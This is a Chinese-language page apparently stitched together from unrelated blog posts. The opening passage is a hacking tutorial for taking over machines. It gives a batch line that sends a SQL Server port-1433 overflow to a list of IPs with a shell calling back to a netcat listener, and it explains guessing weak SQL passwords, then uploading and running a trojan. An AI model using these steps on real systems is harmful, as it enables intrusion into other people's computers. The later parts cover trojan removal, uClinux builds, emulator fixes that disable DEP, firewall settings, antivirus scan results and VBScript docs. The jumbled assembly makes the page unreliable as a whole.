好了,nc解说完毕。轮到说:sqlhello了这个工具是输送溢出的指令的。。 也写个简简单单的批处理: @for /f %%i in (a.txt) do sqlhello %%i 1433 10.10.5.245 2004 %%是写批处理的时候特别出现的,如果在直接在命令行下打用 % 就可以了 这个批处理的意思是:把溢出的指令送到 a.txt里面的ip 和对应的端口来本地监听的是2004这个端口(用nc监听的,刚才说了。)
5、扫1433抓肉鸡之方法2
要用到的工具:端口扫描器 X-scan SQL综合利用工具
上面我们说过了,1433溢出现在成功率已经不高了,所以我们可以用另一种方法。
开了1433端口的机器一般都装了SQL,所以我们可以猜测SQL弱口令来抓1433肉鸡。
首先先用端口扫描器扫一段IP的1433端口,然后结果保存为文本文件,接着用X-scan导入这些开了1433的IP,然后在扫描参数-全局设置-扫描模块这一栏里只勾上SQL-SERVER就可以了,其他不要勾。然后在插件设置-端口相关设置-待检测端口这一栏,只填1433端口。然后就可以开始扫描了。扫描完成后会有个报告,列出了有弱口令的机器,然后打开SQL综合利用工具,输入你扫到的弱口令来连接,接着打开SQL综合利用工具-利用目录,上传你的木马,然后在用DOS命令执行你的木马就OK了
最近这个木马较猖獗,症状是“开始”菜单多出一个名为 carlton 的快捷方式(也许没有),系统根目录下(可能会)出现随机名字的十字架图标的文件(如下图),任务管理器里有可疑进程VTTray.exe(一定有),网速明显变慢,甚至打不开网页。
这个病毒要是在要是在一个公共网络传播开来那很麻烦,本人所在的公共网络有70台电脑,大约20多台为ME系统没有问题,大部分的2000感染,中此病毒后,路由显示有2198台电脑(而且还在不断变化),这显然是该病毒发送大量的IP包造成的。
如何处理这个病毒,请用下面的方法:
抽掉网线
开机进入安全模式,停用显示名称为 s3contrl (32-bit) 的系统服务(可能停不掉,我重新装了系统)
进入注册表,查找VTTray,删除所有键值和子项(有多个)
可手动删除之,先终止该进程(如果在安全模式下出现的话,如果没有出现可以直接删除)然后删除 C:\\WINNT 目录下隐藏文件 VTTray.exe
VTTray.exe 可能当时删不掉,终止所有其它应用程序后再试试看,一定能删除的
删除根目录下如C盘下随机文件名的十字架图标文件和“开始”菜单里的名为 carlton 的快捷方式
本人曾简单制作一个免疫包,但是马上被该病毒破坏。
瑞星可以杀掉,但是马上会出现,出现的时候瑞星有进程VTTray.exe修改注册表的提示。
该木马依靠猜测弱用户密码传播,给你的管理员帐户设置一个复杂的密码也许可以防止再次感染该木马。
最保险的方案就是安全模式下杀毒,然后按照上面的操作,停用其服务,删除文件,然后打上所有的漏洞补丁,给超级用户设定复杂的密码,就可以防止该病毒!
建议维修时先维修装有共享打印机的电脑,这样可以先保证打印机的使用。
C盘下还有个随机名字的十字架图标的文件吧
“开始”菜单还多了一个名为 carlton 的快捷方式
VTTray.exe注册了一个显示名称为 s3contrl (32-bit) 的系统服务以实现开机自启动
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\s3contrl (32-bit)子键
最近这个木马较猖獗,症状是“开始”菜单多出一个名为 carlton 的快捷方式,系统根目录下出现随机名字的十字架图标的文件,任务管理器里有可疑进程VTTray.exe,网速明显变慢,甚至打不开网页。
这个病毒要是在要是在一个公共网络传播开来那肯定又要搞的网管头大了地
???是不是 regdll.exe 的变种 ???
VTTray.exe注册了一个显示名称为 s3contrl (32-bit) 的系统服务以实现开机自启动,以下是它改动注册表的地方
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\s3contrl (32-bit)]
"DisplayName"="s3contrl (32-bit)"
"ErrorControl"=dword:00000000
"ImagePath"=hex(2):22,00,43,00,3a,00,5c,00,57,00,49,00,4e,00,4e,00,54,00,5c,00,\\
56,00,54,00,54,00,72,00,61,00,79,00,2e,00,65,00,78,00,65,00,22,00,00,00
"ObjectName"="LocalSystem"
"Start"=dword:00000002
"Type"=dword:00000110
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\s3contrl (32-bit)\\Security]
"Security"=hex:01,00,14,80,a0,00,00,00,ac,00,00,00,14,00,00,00,30,00,00,00,02,\\
00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\\
00,00,02,00,70,00,04,00,00,00,00,00,18,00,fd,01,02,00,01,01,00,00,00,00,00,\\
05,12,00,00,00,00,00,00,00,00,00,1c,00,ff,01,0f,00,01,02,00,00,00,00,00,05,\\
20,00,00,00,20,02,00,00,00,00,00,00,00,00,18,00,8d,01,02,00,01,01,00,00,00,\\
00,00,05,0b,00,00,00,20,02,00,00,00,00,1c,00,fd,01,02,00,01,02,00,00,00,00,\\
00,05,20,00,00,00,23,02,00,00,00,00,00,00,01,01,00,00,00,00,00,05,12,00,00,\\
00,01,01,00,00,00,00,00,05,12,00,00,00
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\s3contrl (32-bit)\\Enum]
"0"="Root\\\\LEGACY_S3CONTRL_(32-BIT)\\\\0000"
"Count"=dword:00000001
"NextInstance"=dword:00000001
注:红色部份是导出为文本时的数据,在注册表相关位置,其显示为
"ImagePath"="C:\\WINNT\\VTTray.exe" 数据类型为 REG_EXPAND_SZ
360安全卫士不查杀它,瑞星卡卡也是在未知病毒查杀一栏询问你是否删除
可手动删除之,先用360或卡卡终止该进程,然后删除 C:\\WINNT 目录下隐藏文件 VTTray.exe
VTTray.exe 可能当时删不掉,终止所有其它应用程序后再试试看,一定能删除的
删除根目录下如C盘下随机文件名的十字架图标文件和“开始”菜单里的名为 carlton 的快捷方式
最后找到注册表该位置 HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\s3contrl (32-bit),删除该子键及其下所有内容
该木马依靠猜测弱用户密码传播,给你的管理员帐户设置一个复杂的密码即可防止再次感染该木马
标签:exe
20070628 skyeye uclinux make exe ok
http://www.yippeesoft.com
cpu: arm7tdmi
mach: at91
mem_bank: map=M, type=RW, addr=0×00000000, size=0×00004000
mem_bank: map=M, type=RW, addr=0×01000000, size=0×00400000
mem_bank: map=M, type=R, addr=0×01400000, size=0×00400000, file=romfs.img
mem_bank: map=M, type=RW, addr=0×02000000, size=0×00400000
mem_bank: map=M, type=RW, addr=0×02400000, size=0×00008000
mem_bank: map=M, type=RW, addr=0×04000000, size=0×00400000
mem_bank: map=I, type=RW, addr=0xf0000000, size=0×10000000
lcd: state=on
新建一个 HELLO.C文件#include <stdio.h>
int main(void)
&leftsign;
printf("www.yippeesoft.com Hello uclinux!\\n");
return 0;
&rightsign; 并FTP到 /HOME/SF
10、返回到 /HOME/SF 目录,arm-elf-gcc -Wl,-elf2flt -o hello hello.c,
[root@mobile skyeye]# mkdir romtmp
[root@mobile skyeye]# mount -o loop romfs.img romtmp
[root@mobile skyeye]# mkdir romfs
[root@mobile skyeye]# cp -r romtmp/* romfs
[root@mobile skyeye]# cp hello ./romfs/bin
[root@mobile skyeye]# umount romtmp/
[root@mobile skyeye]# genromfs -f romfs.img -d romfs/
../skyeye_1_2_2_Rel/binary/skyeye -e linux
Welcome to
____ _ _
/ __&line; &line;&line;_&line;
_ _&line; &line; &line; &line; _ ____ _ _ _ _
&line; &line; &line; &line; &line; &line; &line;&line; &line; _ \\&line; &line; &line; &line;\\ \\/ /
&line; &line;_&line; &line; &line;__&line; &line;&line; &line; &line; &line; &line; &line;_&line; &line;/ \\
&line; ___\\____&line;_&line;&line;_&line;_&line; &line;_&line;\\____&line;\\_/\\_/
&line; &line;
&line;_&line;
GDB/ARMulator support by <davidm@snapgear.com>
For further information check:
http://www.uclinux.org/
Command: /bin/ifconfig eth0 up 10.0.0.2
Execution Finished, Exiting
Sash command shell (version 1.1.1)
/> cd bin
/bin> ./hello
www.yippeesoft.com Hello uclinux!
/bin>
http://blog.chinaunix.net/u1/33990/showart_275369.html
SkyEye+uClinux+MiniGUI+SQlite(连载)
资料:
标题: 学习使用SkyEye仿真[2005年08月03日更新] http://www.linuxsir.org/bbs/showthread.php?t=106835
http://www.yippeesoft.com/blog/p/embedded1skyeyelinuxinst.phphttp://qingfeng.com.ru/bbs/viewthread.php?tid=18&extra=page%3D1 Skyeye安装笔记http://blog.csdn.net/gstreamer/articles/1176118.aspx
uClinux2.6入门
终于在RH9上成功安装skyeye并顺利运行自己的应用程序 http://ustcers.com/blogs/drizztzou/archive/2005/07/05/11082.aspx
用skyeye启动uclinux http://hi.baidu.com/embeded_gubi/blog/item/f0f01b246c06672ad5074262.html
陈渝大侠翻译的 uClinux2.6入门
http://www.21ic.com/news/n6708c79.aspx
http://hi.baidu.com/ppkqq/blog/item/8125d31fc9d44762f724e426.html
http://www.blogcn.com/user62/icebirds/ 内核编译 [原]
http://hi.baidu.com/ppkqq/blog/item/8125d31fc9d44762f724e426.html Skyeye安装
http://blog.sina.com.cn/u/407d1abb010007vt 使用SKYEYE 陈渝
完成hello程序(初学uclinux第一个程序)http://blog.chinaunix.net/u/16255/showart_106921.html
http://www.minigui.org/cgi-bin/lb5000/topic.cgi?forum=6&topic=5548&show=0
MiniGUI 1.3.3 移植详解
作者:大漠孤狼 E-Mail:yuqiang0107@126.com
http://mcsuper.spaces.live.com/blog/cns!6aedb92f80c453ef!228.entry
SKYEYE安装:
20070703 VPCAppSv.sys win2003 boot.ini Execute wince
http://www.yippeesoft.com
换了新机器,感觉稳定多了,昨天想用手机的闹钟,一个AUTOFLY居然不能放铃声,一个CITYTIMEALERM居然要注册
晕倒,有空自己写一个算了,把SP2003 SDK都装上去,以前WINXP都没问题,WIN2003居然。。。
ActiveSync 4.5.msi EmuASConfig.msi Microsoft SMARTPHONE 2003 SDK.msi MobileAppDevToolkit.exe WindowsMobilePowerToys.msi
Windows Mobile 2003 Second Edition Emulator Images for Smartphone – CHS.msi
Windows Mobile 2003 Second Edition Emulator Images for Smartphone – WWE.msi
微软官方网站都只看到MOBILE 5.0的了,晕倒~
http://www.microsoft.com/downloads/details.aspx?FamilyID=74473fd6-1dcc-47aa-ab28-6a2b006edfe9&displaylang=en
http://www.opennetcf.org/
http://www.microsoft.com/downloads/details.aspx?familyid=A6C4F799-EC5C-427C-807C-4C0F96765A81&displaylang=en
http://www.microsoft.com/downloads/details.aspx?familyid=791BAE52-B057-4D72-B263-105534825CA5&displaylang=en
事件类型: 错误
事件来源: Service Control Manager
事件种类: 无
事件 ID: 7000
日期: 2007-3-20
事件: 8:35:38
用户: N/A
计算机: SF
描述:
由于下列错误,Virtual PC Application Services 服务启动失败:
此驱动程序被阻止加载
事件类型: 错误
事件来源: Application Popup
事件种类: 无
事件 ID: 875
日期: 2007-3-20
事件: 8:34:11
用户: N/A
计算机: SF
描述:
阻止加载驱动程序 VPCAppSv.sys。
数据:
0000: 00 00 10 00 02 00 74 00 ……t.
0008: 00 00 00 00 6b 03 00 c0 ….k..À
0010: 00 00 00 00 6b 03 00 c0 ….k..À
0018: 00 00 00 00 00 00 00 00 ……..
0020: 00 00 00 00 00 00 00 00 ……..
0028: c6 67 09 2c 0b 9e ea 48 Æg.,.êH
0030: ac 1f 31 69 5f 08 a6 05 ¬.1i_.¦.
在 设备管理器—-系统设备 里有一个Virtual PC Application Services设备前面是感叹号,点属性说“由于在 Windows 中有问题,这个设备的软件无法启动。请跟硬件供应商联系,获取一个新的驱动程序。 (代码 48)
单击“疑难解答”启动这个设备的疑难解答。”,用“扫描检测硬件改动”也没有用,这是怎么回事,它是干什么用的
1.26. 如何确定设备中安装的 .NET Compact Framework 的版本?
发行的每个 .NET Compact Framework 版本都有一个不同的 Win32 文件版本号(它是与程序集版本相独立的版本号,对于发行的所有 .NET Compact Framework 第一版(包括 Service Pack),这两者应该是一样的)。
要查看安装的是什么版本,可以使用文件资源管理器,定位于设备的 \\Windows 目录,并单击名为 CGACUTIL 的文件。将会弹出一个消息框,显示安装在设备中的 .NET Compact Framework 的 Win32 文件版本。
RTM = 1.0.2268.0SP1 = 1.0.3111.0SP2 Recall = 1.0.3226.0SP2 Beta = 1.0.3227.0SP2 Final = 1.0.3316.0
11.9. 当模拟器第一次在 Windows Server 2003 机器上使用时,为什么会产生安全警告消息?
表现:当在 Windows Server 2003 机器上安装 Visual Studio .NET 2003 之后,第一次使用模拟器时会弹出一个标题为“Security Alert — Driver Installation”的消息框。消息文本的开头为“The driver software you are installing for:Virtual PC Application Services has been signed with Authenticode(TM) technology.The publisher\’s identity has been identified, and the driver has not been modified since it was published”。文本结束部分写到“However, this driver cannot be tested by Microsoft Windows Hardware Quality Labs to verify its compatibility with this version of Windows. Do you trust this publisher and want to install the driver?”
原因:Visual Studio .NET 2003 安装了一个 Virtual PC Application Services Emulator 驱动程序,它并没有传递 Windows Server 2003 的 Driver Validation 系统的验证结果。
解决办法:当出现这种警告消息时,单击 Yes 按钮。否则模拟器将不工作。
EVC的安装问题 Tinner @ 2006-7-21 16:14
此问题多会出现在使用64位处理器,并且使用Windows XP SP2的系统上
问题表现为:安装EVC后,重新启动机器,任务栏弹出提示框,提示名为Virtual PC Application Services的驱动程序与系统冲突,在设备管理器中会发现此设备被禁用。另外,在EVC中编写好程序后无法使用Emulator调试,提示 Emulator缺失文件
问题原因:64位处理器和Windows XP SP2的DEP功能与这个设备冲突,导致Emulator无法使用
解决:关闭DEP,详细方法如下:
1、右键点击“我的电脑”,选择属性中的“高级”栏
2、点击“启动和故障恢复”中的“设置”按钮,进入“启动和故障恢复”对话框
3、点击“编辑”按钮,编辑boot.ini文件(对系统熟悉可以直接双击系统目录下boot.ini文件进行编辑)
4、在Microsoft Windows XP Professional字样后面的位置,添加“/execute”(不包括引号“”),如果有类似“/noexecute=optin ”的选项要删除掉
5、重新启动机器,应该就正常了。
WINCE4.2模拟器与PAE(物理地址扩展)之间存在的冲突。
硬件环境:
CPU:Althon64 3000+
内存:Kingstone 512*2
主板:Abit KV8 PRO
软件环境:
OS:WINXP SP2
近日为了做公司的项目安装了eVC的开发环境,安装过程中发现了WINCE4.2模拟器与PAE(物理地址扩展)之间存在的冲突。WINCE4.2模拟器会在WINXP中安装一个名叫“Virtual PC Application Services”的驱动程序,在安装这个驱动程序的时候WINXP报这个驱动会使系统产生不稳定,然后自动不让这个驱动生效。这个驱动不能用,自然也无法用WINCE4.2模拟器调试程序。
从下面这个网页知道了发生冲突的原因:
http://support.microsoft.com/default.aspx?scid=kb;en-us;883989
但根据MS提供的解决方法,在我的C:\\Boot.ini中找不到/PAE选项。
不过,想到自己还在VMWARE里面装了一个WIN2KPRO呢,WINXP下面不行,我就去WIN2K下面试试。
可是在VMWAREWIN2K中发现WINCE模拟器启动以后,里面一直黑屏,防火墙ZA关了都一样。最后,只能认为WINCE模拟器不能在VMWARE中运行,这条路也走不通。
这时候我还想,既然eVC和WINCE模拟器都是MS开发的,那么Virtual PC应该能支持的好些。可觉得还要在Virtual PC里面装个OS,实在麻烦。
那么先google一下有没有禁用PAE的方法,终于在下面这个页面里找到了。
http://support.microsoft.com/default.aspx?scid=kb;zh-cn;875352
把C:\\Boot.ini中的/noexecute改为/execute,重启,PAE功能就被禁用了,开发的程序也能顺利的在WINCE模拟器中进行调试了。
另外,根据资料发现PAE主要是使系统能使用4GB以上的内存,而且是使用DEP(数据执行保护)的前提条件,所以禁用PAE能提高系统的兼容性,不会对系统效率造成太大影响,只是使系统有些不安全。
MS推荐一种能够针对指定的应用程序不使用DEP的方法,但我这边与PAE发生冲突的是一个驱动程序,还不知道怎么对一个驱动程序进行设置,具体方法在寻找中。
问题是我的是 /NoExecute=AlwaysOff
总是禁用 无论硬件 DEP 是否支持,此设置都不会为系统的任何部分提供 DEP 保护。除非在 Boot.ini 文件中包括“/PAE”选项,否则处理器不会在 PAE 模式下运行。
20070416 TR2C SonicStage Look\’n\’stop AUT0EXEC.exe
http://www.yippeesoft.com
安装步骤:
1.在硬盘上建立新的文件夹,用于存放下载的文件。
2.下载以下文件保存到步骤 1.建立的文件夹中。文件名:5_3_509_2a.zip(648 KB)
3.下载完成后,在文件管理器中点击[查看>-[ 详细信息>确认文件的大小, 如 果与上述数值不符,说明下载过程中有错误,请删除该文件重新下载。
4.把下载的文件解压缩,并记下所在的文件夹名称。
5.中止所有正在运行的应用程序。
6.单击“开始” →“控制面板” →“系统” →“硬件”→“设备管理器” →“鼠标和其它指针设备” →“Alps Pointing-device” →“驱动程序” →“更新驱动程序”
7.在弹出的“硬件更新向导”中选择“从列表或指定位置安装”,单击“下一步”。
8.选择“在搜索中包括这个位置”并单击“浏览”选择保存解压文件所在的文件夹。
9.单击“下一步”,按提示完成并重新启动计算机。
检查驱动更新程序安装后是否正确:
1.单击“开始” →“控制面板” →“系统” →“硬件”→“设备管理器” →“鼠标和其它指针设备” →“Alps Pointing-device” →“驱动程序”
2.确认以下信息:驱动程序日期:2003-2-27;驱动程序版本:5.3.509.2;数字签名程序:Microsoft Windows Hardware Compatibility Publisher。
5_3_509_2a
SONY索尼全系列笔记本SonicStage1.5升级程序
适用机型:PCG-TR1C,PCG-V505GCP ,PCG-V505GZC
注意:
1. 请断开所有外围设备,包括PC卡(Sony PC卡光驱和软驱除外)。
2. 在整个升级过程中请使用专用交流电源适配器对VAIO计算机供电,不要中断或关闭电源。
3. 在整个升级过程中请不要运行任何程序,除非系统提示,请不要重新启动系统。
解决的问题:
1. 播放某些类型的声音文件可能有噪音。
2. 备份工具中的恢复数据功能可能无法正常使用。
3. 当选择“最大可用传输空间”模式时,可能无法用ATRAC3 132kbps 格式导出到记忆棒。
4. 如果文件名中有“;”,无法备份工具备份CD-R。安装补丁后,可以备份,但文件名中的\\";\\"会被\\"_\\"代替。例如:文件名“a;”会变成“a_”
5. 在MD或PD中播放时,双击其他歌曲时,仍然播放第一首歌。
SONY VIAO全系列触摸板驱动下载
世界第一防火墙Look\’n\’stop使用设置指南
当你双击系统托盘里Look\’n\’stop图标时所打开的主界面;Look\’n\’stop的界面是标签型的,几乎所有的设置都直接在此界面上完成,共有如下六个标签
1.“欢迎”标签:基本运行状态,显示本机的IP地址信息、计算机名、Look\’n\’stop版本信息和本次开机了的数据流量统计,表示防火墙是否与本机网络设备正确连接并处于工作状态。
2.“应用程序过滤”标签:本文的重点讲解对象,不忙说它。
3.“互联网过滤”标签:同应用程序过滤标签。
4.“日志”标签:地球人都明白,可是不一定知道怎么用,得说说。
5.“选项”标签:顾名思义,不过还是得唠叨一下。
6.“注册”标签:一句话,如果注册成功了,“验证”按钮是灰色的,恭喜。
注意:你在使用下述图解时,请一定先打开Look\’n\’stop“选项”→“高级选项”→选中“高级模式”,切记。
(一)应用程序过滤—-专门对程序进行设定,决定应用程序行为的设置
大家先仔细看看该界面
Click here to open new window CTRL Mouse wheel to zoom in/out先看左侧区域,这个区显示是正连接在网络上或者曾经连接过网络目前还没有关闭的应用程序列表。
重点看右侧区域,有N多的门道在里面。猛一看是已允许的信任程序,仔细有很多属性,偶已经列出了11种属性,当然也是全部属性了。同时还可看到应用程序名称和位置信息,能为确定程序的合法性提供一点参考。
现在按此区的“列”来开讲,先确定已选中黑色编号12“应用程序过滤已启用”,否则所做的任何设置都不起作用。
1.第一列只有二种属性,简而言之就是启用或者禁用该规则(即过滤激活),鼠标单击实现二种属性之间的切换。见黑色编号1,黑色编号2所指。
黑色编号1,是指启用该条规则,也就是说让该程序按既定的规则运行,此所谓的应用程序过滤。如果你不想使为这个程序设定的规则起作用的话,那么点击一下,就会变成黑色编号2所指的样子,此时该规则相当于不存在,当下次启动该应用程序时,Look\’n\’stop还会询问的。
2.第二列有三种属性,分别是允许(黑色编号5)、禁止(黑色编号4)、自定义(黑色编号3)。单击则在允许与禁止之间切换,如果有自定义属性,则在三者之间进行切换。
黑色编号3:黄色圆饼标志。当你为此程序制定了特殊规则,如指定程序只能连接远程的哪些端口、或者不允许连接哪些端口;允许连接哪些地址、禁止连接哪些地址时,则出现黄色的圆饼标志。具体设置方法如下:
双击某个程序(当然也可以通过点击黑色编号11来实现),就会出现如图3所示的“选择端口和IP地址”窗口,此时你可以设置具体的内容了。
比如,偶的Dreammail邮件客户端,偶只允许它连接远程的25、110和80端口,不允许连接其它端口,那么就按如图3所示进行设置;此时对IP地址没有限制。如果你想让他只连接远程的某个IP地址,那么就在IP地址栏输入。
这个自定义功能并不只是如此简单,重要的不是允许去什么地方,而是禁止它去什么去什么地方。比如,你的CuteFTP一启动就想去它的主站验证一下它的合法性,那么你就可以在这里设置一下了,而又不影响其它程序(如IE)访问CuteFTP的主站。
那么,允许和禁止在这里如何区别开来?其实很简单,允许访问的端口或者IP,则直接输入在里面就行。如果你要禁止某个端口或者地址,只要在端口或者IP地址前面加上一个半角的感叹号“!”就行了,是不是真的简单?对了,如果是多个IP或者端口,不要忘记在它们之间加上一个半角的分号“;”即可。如果是端口范围或者IP地址范围,则在起始之间用“-”连接起来就行。
黑色编号4:红色禁止标志。此标志表示禁止该程序连接网络。
黑色编号5:绿色允许标志。此标志表示允许该程序连接网络。
3.现在来看第三列,此列只有二种属性,单击则实现二种属性之间的切换。见黑色编号6、黑色编号7。 这一列是强大功能的一个体现,作用是允许或者禁止此程序调用另一个程序并且使用被调用的这个程序连接网络,也就是说:A程序启动了B程序,B程序有连网企图,此属性就是对这种情况进行控制的。必须打开“高级选项”中的“高级模式”才会出现此列,不打开则不出现但此列的功能实际上在起作用。
黑色编号6:双箭头标志。为此标志时则意味着允许当前程序去调用另外一个并要使其连接网络的程序。
黑色编号7:红色禁止标志。为此标志时不允许当前程序去调用另外一个要使其连接网络的程序,当然如果被调用的程序没有连接网络的企图,则防火墙是不出现提示的,如果被调用的程序有连接网络的企图,则防火墙拦截这个连接。
4.第四列,此列有三种属性,决定了是否记录日志或者弹出提示窗口,其中二种属性与第一列的属性配合才能看到效果。三种属性分别对应于黑色编号8、黑色编号9、黑色编号10。
黑色编号10:如果是这个标志,则什么也不发生,相当于此功能被禁用。
黑色编号9:单感叹号标志。此标志表示弹出消息框(如果你在“日志”标签中勾选了“消息框”的话)或在日志中记录(也需要打开“日志”标签中的记录日志功能)该应用程序的连网“企图”,此时要与第一列配合使用,第一列的属性必须是禁止标志才起作用。这个功能的好处太多了,比如:一个被你禁止了的程序,可能也已经关闭了,但在日志中频频出现试图连网的记录,估计它也不是什么好东西,木马常常这么干!
黑色编号8: 双感叹号标志。此标志表示无论该程序是禁止还是允许连网,都在日志中记录或者弹出消息框。正常使用时最好不打开此属性,调试Look\’n\’stop时是便利的办法。
好了,应用程序过滤部分到此完毕。可以看出,Look\’n\’stop对程序的控制非常灵活且强大,方便简洁,10个属性有36种不同组合。仅一个页面可以实现允许禁止、记录与否、单程序访问、进程调用四种功能的控制
当一个应用程序需要访问网络的时候,Look\’n\’stop会弹出如上图A对话框提示,使用两个单选框(虽然看起来是复选的,但只能单选)配合两个按钮可以指定这个应用程序的联网行为,指定了的程序就会显示在上面图2所示的应用程序列表里了,例如图2第6行的TheWorld.exe。单纯点“允许”就是允许该应用程序访问网络,如果同时选择了“只此一次”就是只允许当前的一个连接请求(一个程序连接到一个相同的地方可能会发起几个连接请示而不是一个),如果这个程序再次发起一个连接请求的话,会看到同样的验证提示。如果选择了“只此会话”,会话的意思是这次的Look\’n\’stop会话过程,这个选项意思是允许直到这次Look\’n\’stop关闭为止。某些地方说“直到重启系统”,是不严谨的。(选择了“只此xx”的应用程序会暂时出现在列表中,直到他的验证有效到期,自动被从列表删除)当然相应的选择对于“拦截”也有相同的意义,不再细述。
有时,还会看到如下这种验证对话框
出现图B这种验证对话框的情况就是:一个程序(显示在上面的)启动了另一个应用程序(显示在下面),并且被启动的应用程序连接网络。请注意这种情况,一些木马就有这种行为。
需要注意的是,在这里选择允许或者拦截,针对的是上面的程序启动下面的程序访问网络这个行为,也就是说,如果选择了“允许”,则在列表中添加了显示在上面的应用程序,其自身禁止访问网络,但是被这个程序启动的其它程序可以访问网络。例如图2中第三行的TMShell.exe。(类似的还有QQ珊瑚虫外挂的 CoralQQ.exe,它自身不用访问网络,而是启动了QQ.exe来访问网络)但是,如果这里选择了“允许直接连接”,那么这个应用程序则也可以直接访问网络,选择这个选项的时候应确定这个程序是安全的。“只此一次”和“只此会话”选项的用途和前面介绍的相同。
还需要注意的是,这个对话框的“允许”只是针对显示在上面的应用程序(如图B中的TWTweaker.exe),也就是说如果被它启动的显示在下面的应用程序(如图B中的TheWorld.exe)尚未验证的话,又会跳出另一个如图A的单独验证对话框。
AntiVir 7.3.0.32 01.30.2007 HEUR/Malware
Authentium 4.93.8 01.29.2007 no virus found
Avast 4.7.936.0 01.30.2007 Win32:Agent-DHX
AVG 386 01.30.2007 PSW.Agent.ELX
BitDefender 7.2 01.30.2007 Generic.Malware.SFdldg.BD1C15D2
CAT-QuickHeal 9.00 01.29.2007 no virus found
ClamAV devel-20060426 01.30.2007 no virus found
DrWeb 4.33 01.30.2007 DLOADER.Trojan
eSafe 7.0.14.0 01.30.2007 suspicious Trojan/Worm
eTrust-InoculateIT 23.73.128 01.30.2007 no virus found
eTrust-Vet 30.3.3358 01.29.2007 no virus found
Ewido 4.0 01.30.2007 no virus found
Fortinet 2.85.0.0 01.30.2007 PossibleThreat
F-Prot 4.2.1.29 01.30.2007 no virus found
Ikarus T3.1.0.27 01.30.2007 no virus found
Kaspersky 4.0.2.24 01.30.2007 Trojan-PSW.Win32.Agent.ha
McAfee 4951 01.29.2007 no virus found
Microsoft 1.2101 01.30.2007 no virus found
NOD32v2 2020 01.30.2007 no virus found
Norman 5.80.02 01.30.2007 no virus found
Panda 9.0.0.4 01.29.2007 Suspicious file
Prevx1 V2 01.30.2007 no virus found
Sophos 4.13.0 01.28.2007 no virus found
Sunbelt 2.2.907.0 01.26.2007 no virus found
Symantec 10 01.30.2007 Infostealer
TheHacker 6.0.3.159 01.28.2007 no virus found
UNA 1.83 01.29.2007 no virus found
VBA32 3.11.2 01.29.2007 no virus found
VirusBuster 4.3.19:9 01.30.2007 no virus found
Aditional Information
File size: 17920 bytes
MD5: 17cc75bfbf4bddddbe83ae4199d55304
SHA1: 69a14909f5ef698d8019d51d7bc7512ef7ff0cf5
packers: UPX
packers: UPX
packers: UPX, BINARYRES
packers: UPX
20070119 vbs eval execute
WWW.SHENGFANG.ORG
Execute 语句
执行一个或多个指定的语句。
Execute statements
所需要的 statements 参数是一个字符串表达式,其中包含一个或多个要执行的语句。 如果要在 statements 参数中包含多条语句,应使用分号或嵌入的分行将其分隔开。
说明
在 VBScript 中,x = y 可以有两种解释。首先是作为赋值语句,将 y 的值赋予 x。其次是作为表达式,测试x 和 y 的值是否相等。如果相等,结果为 True;否则,结果为 False。Execute 语句总是使用第一种解释,而 Eval 方法总是使用第二种。
注意 在 Microsoft(R) Visual Basic Scripting Edition 中并不存在赋值与比较之间的混淆,因为赋值运算符(=)与比较运算符(==)是不同的。
调用 Execute 语句的上下文确定了要运行的代码可以使用的对象和变量。作用域内的对象和变量是 Execute 语句中运行的代码可以使用的。不过,必须明白的一点是,如果被执行的代码创建了过程,那么该过程将不会继承它所在的过程的作用域。
与其他过程类似,新的过程的作用域是全局的,它继承了全局作用域的全部东西。与其他过程不同的是,它的上下文不是全局作用域,因此它只能在发生 Execute 语句的过程内的上下文中执行。不过,如果相同的 Execute 语句是在过程之外(例如在全局作用域)的作用域中被调用,那么它将不仅继承全局作用域中的所有东西,而且它还可以在任何地方被调用,因为它的上下文是全局的。下面的例子说明了这种特点:
Dim X \’ 在全局作用域中声明 X。
X = "Global" \’ 将全局的 X 赋值。
Sub Proc1 \’ 声明过程。
Dim X \’ 在局部作用域中声明 X。
X = "Local" \’ 对局部的 X 赋值。
\’ 此处的 Execute 语句建立了一个过程,
\’ 在调用该过程时它将打印 X。
\’ 它打印的将是全局 X,因为 Proc2
\’ 继承了全局作用域中的一切。
Execute "Sub Proc2: Print X: End Sub"
Print Eval("X") \’ 打印本地 X。
Proc2 \’ 在 Proc1 的作用域中调用 Proc2。
End Sub
Proc2 \’ 本行将导致一个错误,因为
\’ Proc2 在 Proc1 之外是不可使用的。
Proc1 \’ 调用 Proc1。
Execute "Sub Proc2: Print X: End Sub"
Proc2 \’ 这句话可以成功,因为 Proc2
\’ 现在是全局可用的。下面的例子显示了如何将 Execute 语句改写,免于将整个过程包含在引号内:
S = "Sub Proc2" & vbCrLf
S = S & " Print X" & vbCrLf
S = S & "End Sub"
Execute S
Eval 函数
计算一个表达式的值并返回结果。
[result = ]Eval(expression)
参数
result
可选项。 是一个变量,用于接受返回的结果。如果未指定结果,应考虑使用 Execute 语句代替。
expression
必选项。可以是包含任何有效 VBScript 表达式的字符串。
说明
在 VBScript 中,x = y 可以有两种解释。第一种方式是赋值语句,将 y 的值赋予 x。第二种解释是测试 x 和 y 是否相等。如果相等,result 为 True;否则 result 为 False。Eval 方法总是采用第二种解释,而 Execute 语句总是采用第一种。
注意 在Microsoft(R) Visual Basic Scripting Edition 中不存在这种比较与赋值的混淆,因为赋值运算符(=)与比较运算符 (==)不同。
下面的例子说明了 Eval 函数的用法:
Sub GuessANumber
Dim Guess, RndNum
RndNum = Int((100) * Rnd(1) + 1)
Guess = CInt(InputBox("Enter your guess:",,0))
Do
If Eval("Guess = RndNum") Then
MsgBox "祝贺你!猜对了!"
Exit Sub
Else
Guess = CInt(InputBox("对不起,请再试一次",,0))
End If
Loop Until Guess = 0
End Sub
20070103 g0ld.com.exe nsSCM.dll
mssvc32.dll DDoS-Rincux
STATUS: FINISHEDComplete scanning result of "g0ld.com.exe", received in VirusTotal at 12.06.2006, 15:52:56 (CET).
Antivirus Version Update Result
AntiVir 7.2.0.49 12.06.2006 no virus found
Authentium 4.93.8 12.05.2006 no virus found
Avast 4.7.892.0 12.06.2006 Win32:Agent-CRX
AVG 386 12.06.2006 no virus found
BitDefender 7.2 12.06.2006 no virus found
CAT-QuickHeal 8.00 12.05.2006 (Suspicious) – DNAScan
